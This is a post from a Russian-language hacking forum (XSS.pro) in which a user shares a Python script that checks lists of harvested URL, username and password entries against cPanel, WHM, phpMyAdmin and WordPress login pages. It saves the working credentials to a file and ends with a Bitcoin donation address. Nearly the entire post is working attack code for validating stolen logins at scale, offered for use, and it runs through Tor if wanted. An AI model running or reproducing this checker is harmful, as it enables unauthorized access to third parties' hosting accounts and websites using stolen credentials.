• XSS.stack #1 – первый литературный журнал от юзеров форума

прочее Валидатор для ваших админок

Encommerce

(L3) cache
Пользователь
Регистрация
25.11.2022
Сообщения
235
Реакции
97
Написал простенький валидатор для админок :)

cpanel/whm/phpmyadmin чекаются без проблем
wordpress с косяками

Позже планирую немного почистить код и исправить баги

Использование:
1. Кладем наши txt файлы рядом с main.py
- названия файлов не имеют значения
- количество файлов любое
- формат строк:
URL: domain
USER: user
PASS: pass
2. Устанавливаем зависимости:
tldextract
aiohttp
3. Запускаем скрипт и ждем

Примечание:
1. Результаты сохраняются в results/output.txt
2. Если чек через тор или просто хуевый интрнет, лучше снизить значение семафора до 20-50


scr.jpg
Python:
import ipaddress
import aiohttp
import asyncio
import html
import re
import os

from dataclasses import dataclass
from tldextract import tldextract



@dataclass
class SortData():
    total = 0
    uniq = 0
    double = 0
    local = 0
    unknown = 0
    errors = 0
    logins = []


def sort(data: list[tuple[str, list[str]]]) -> SortData:

    output = SortData()
    reply = set()

    for file in data:
        filename, lines = file
        for i in range(len(lines)):

            if not lines[i].startswith('URL: '):
                continue

            try:
                url = lines[i].split()[-1]

                # убираем хвостик у wordpress линков
                if 'wp-admin' in url and (not url.endswith('wp-admin')):

                    url = url.rsplit('/', 1)[0]
                user = "".join(lines[i+1].split().pop(-1))
                pswd = "".join(lines[i+2].split().pop(-1))

            except (IndexError, ValueError):
                output.errors += 1
                continue

            output.total += 1

            # убираем локальные ip и домены
            parts = tldextract.extract(url)
            if not parts.suffix:
                if not global_ip(parts.ipv4):
                    output.local += 1
                    continue

            if user == "UNKNOWN":
                output.unknown += 1
                continue

            auth = (url, user, pswd, filename)

            if auth in reply:
                output.double += 1
                continue

            reply.add(auth)
          
            output.logins.append(auth)
            output.uniq += 1

    return output



def global_ip(server: str) -> bool:
    try:
        ipAddrs = ipaddress.ip_address(server)
        if ipAddrs.is_global:
            return True
        return False
    except ValueError:
        return False



class Check():
    def __init__(self, logins) -> None:

        self.logins = logins

        self.valid = open('results/output.txt', 'w+')

        self.cpa_count = 0
        self.whm_count = 0
        self.pma_count = 0
        self.wpa_count = 0

        self.sem = asyncio.BoundedSemaphore(250)

        self.loop = asyncio.new_event_loop()
        self.loop.run_until_complete(self.execute())
      

    async def execute(self):

        tasks = []

        for login in self.logins:
            await asyncio.sleep(1)
            task = asyncio.ensure_future(self.connect(login))
            tasks.append(task)

        await asyncio.gather(*tasks)


    def service(self, http: str) -> str | None:

        if 'cpanel login' in http:
            return 'cpa'
        elif 'whm login' in http:
            return 'whm'
        elif 'wordpress' and 'type="text" name="log"' in http:
            return 'wpa' 
        elif 'phpmyadmin' or 'login into database' in http:
            return 'pma'
      

    async def connect(self, login: list[str]):
        try:
            await self.sem.acquire()

            url, user, pswd, src = login

            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
                'Accept': 'text/plain'
            }

            jar = aiohttp.CookieJar(unsafe=True)

            async with aiohttp.ClientSession(headers=headers,
                requote_redirect_url=True, cookie_jar=jar,
                connector=aiohttp.TCPConnector(ssl=False)) as session:

                async with session.get(url, timeout=5) as resp:
                    cookies = session.cookie_jar.filter_cookies(url)
                    http = await resp.text()
                    service = self.service(http.lower())

                    if service in ['cpa', 'whm']:

                        params = {'login_only': '1'}

                        async with session.post(resp.url, auth=aiohttp.BasicAuth(user, pswd), params=params, timeout=5) as resp:

                            if resp.status == 200:
                                if service == 'cpa':
                                    self.cpa_count += 1
                                    self.valid.write(f"cpa|{url}|{user}|{pswd}\n")
                                    print(f'[cpa] url: {url} user: {user} pass: {pswd}')

                                elif service == 'whm':
                                    self.whm_count += 1
                                    self.valid.write(f"whm|{url}|{user}|{pswd}\n")
                                    print(f'[whm] url: {url} user: {user} pass: {pswd}')


                    elif service == 'pma':

                        data = {
                            'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", http, re.I).group(1)),
                            'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", http, re.I).group(1)),
                            'pma_username': user,
                            'pma_password': pswd,
                        }

                        async with session.post(resp.url, data=data, cookies=cookies, timeout=5) as resp:
                            cookies = session.cookie_jar.filter_cookies(resp.url)

                            if 'pmaAuth-1' in cookies:
                                self.pma_count
                                self.valid.write(f"pma|{url}|{user}|{pswd}\n")
                                print(f'[pma] url: {url} user: {user} pass: {pswd}')


                    elif service == 'wpa':
                      
                        headers = {
                            'Cookie': 'wordpress_test_cookie=WP+Cookie+check'
                        }

                        data = {
                            'log': user,
                            'pwd': pswd,
                            'wp-submit': 'Accept',
                            'redirect_to': url,
                            'testcookie': 1
                        }

                        new_url = url.replace('wp-admin', 'wp-login.php')

                        async with session.post(new_url,
                            data=data, headers=headers,
                            allow_redirects=False, timeout=5) as resp:
                          
                            if resp.status in [301, 302]:
                                self.wpa_count += 1
                                self.valid.write(f"wpa|{url}|{user}|{pswd}\n")
                                print(f'[wpa] url: {url} user: {user} pass: {pswd}')

        except Exception:
            pass

        finally:
            self.sem.release()
  

def main():

    print(f"[i] coded for xss.pro by Encommerce!")

    data = []
    files = os.listdir()

    for file in files:

        if not file.endswith('.txt'):
            continue

        try:
            lines = open(file, encoding='utf-8').readlines()
        except UnicodeDecodeError:
            print(f'{file}: file is not utf-8')
            continue

        count = len(lines)

        if count < 3:
            continue

        print(f'[+] file: {file}, lines: {count}')
        data.append((file, lines))

    if not data:
        print(f'[-] no files avalible')
        return

    sorted = sort(data)

    if not sorted.uniq:
        print(
            f'[-] no uniq\n'\
            f'    >> total count: {sorted.total}\n'\
            f'    >> local hosts: {sorted.local}\n'\
            f'    >> double count: {sorted.double}\n'\
            f'    >> unknown auth: {sorted.unknown}\n'\
            f'    >> format errors: {sorted.errors}'
        )
        return

    print(
        f'[+] > uniq: {sorted.uniq}\n'\
        f'    > total count: {sorted.total}\n'\
        f'    > local hosts: {sorted.local}\n'\
        f'    > double count: {sorted.double}\n'\
        f'    > unknown auth: {sorted.unknown}\n'\
        f'    > format errors: {sorted.errors}\n'\
        f'[+] validation...'
    )

    result = Check(sorted.logins)

    print(
        f"[+] > task completed:\n"\
        f"    > cpa: {result.cpa_count}\n"\
        f"    > whm: {result.whm_count}\n"\
        f"    > pma: {result.pma_count}\n"\
        f"    > wpa: {result.wpa_count}\n"\
        f"[i] support the author!\n"\
        f"[btc] bc1qzzghv2epe3e22waqmyqy4g6fapg2xlxqe2ptey"
    )

if __name__ == "__main__":
    main()
 

Вложения

  • adm-validator.zip
    2.9 КБ · Просмотры: 43


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх